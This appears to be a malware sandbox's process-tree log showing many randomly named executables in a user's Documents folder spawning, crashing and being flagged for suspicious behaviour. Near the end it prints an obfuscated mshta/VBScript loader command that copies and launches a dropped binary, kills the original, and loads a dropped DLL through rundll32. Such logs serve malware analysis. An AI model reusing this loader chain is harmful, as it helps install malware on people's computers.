C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7224 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7156 -s 284⤵
- Program crash
- Checks processor information in registry
-
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6744 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
C:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exeC:\Users\Admin\Documents\Xt8S76sZ9LABcGd96pMW6zN2.exe3⤵
-
-
-
C:\Users\Admin\Documents\qqeppCYqAudj7rRwp42uK0XT.exe"C:\Users\Admin\Documents\qqeppCYqAudj7rRwp42uK0XT.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 2723⤵
- Program crash
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\S9pRj2JglOfvtXhrTk6AWMJB.exe"C:\Users\Admin\Documents\S9pRj2JglOfvtXhrTk6AWMJB.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCrIPt: cLOSe ( CREAteobjecT ( "wScRiPT.ShElL" ). RUN ( "C:\Windows\system32\cmd.exe /C tYpe ""C:\Users\Admin\Documents\S9pRj2JglOfvtXhrTk6AWMJB.exe"" > IQ0V_Fe_.eXE && StaRt IQ0v_FE_.ExE -poRsuYEMryiLi & if """"== """" for %m in ( ""C:\Users\Admin\Documents\S9pRj2JglOfvtXhrTk6AWMJB.exe"" ) do taskkill /iM ""%~NXm"" -F" , 0 , TRUE ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C tYpe "C:\Users\Admin\Documents\S9pRj2JglOfvtXhrTk6AWMJB.exe" > IQ0V_Fe_.eXE && StaRt IQ0v_FE_.ExE -poRsuYEMryiLi& if ""== "" for %m in ( "C:\Users\Admin\Documents\S9pRj2JglOfvtXhrTk6AWMJB.exe" ) do taskkill /iM "%~NXm" -F4⤵
-
C:\Users\Admin\AppData\Local\Temp\IQ0V_Fe_.eXEIQ0v_FE_.ExE -poRsuYEMryiLi5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCrIPt: cLOSe ( CREAteobjecT ( "wScRiPT.ShElL" ). RUN ( "C:\Windows\system32\cmd.exe /C tYpe ""C:\Users\Admin\AppData\Local\Temp\IQ0V_Fe_.eXE"" > IQ0V_Fe_.eXE && StaRt IQ0v_FE_.ExE -poRsuYEMryiLi & if ""-poRsuYEMryiLi""== """" for %m in ( ""C:\Users\Admin\AppData\Local\Temp\IQ0V_Fe_.eXE"" ) do taskkill /iM ""%~NXm"" -F" , 0 , TRUE ) )6⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C tYpe "C:\Users\Admin\AppData\Local\Temp\IQ0V_Fe_.eXE" > IQ0V_Fe_.eXE && StaRt IQ0v_FE_.ExE -poRsuYEMryiLi& if "-poRsuYEMryiLi"== "" for %m in ( "C:\Users\Admin\AppData\Local\Temp\IQ0V_Fe_.eXE" ) do taskkill /iM "%~NXm" -F7⤵
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" VHTDDahA.G,XBvVyh6⤵
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /iM "S9pRj2JglOfvtXhrTk6AWMJB.exe" -F5⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Documents\Ja4_w8NcMFoPBzvBbTh4pLQJ.exe"C:\Users\Admin\Documents\Ja4_w8NcMFoPBzvBbTh4pLQJ.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\Ja4_w8NcMFoPBzvBbTh4pLQJ.exe"C:\Users\Admin\Documents\Ja4_w8NcMFoPBzvBbTh4pLQJ.exe"3⤵
-
-
-
C:\Users\Admin\Documents\XeAC_eAUSdkfGpqWBMt8ES_x.exe"C:\Users\Admin\Documents\XeAC_eAUSdkfGpqWBMt8ES_x.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\XeAC_eAUSdkfGpqWBMt8ES_x.exe"C:\Users\Admin\Documents\XeAC_eAUSdkfGpqWBMt8ES_x.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
-
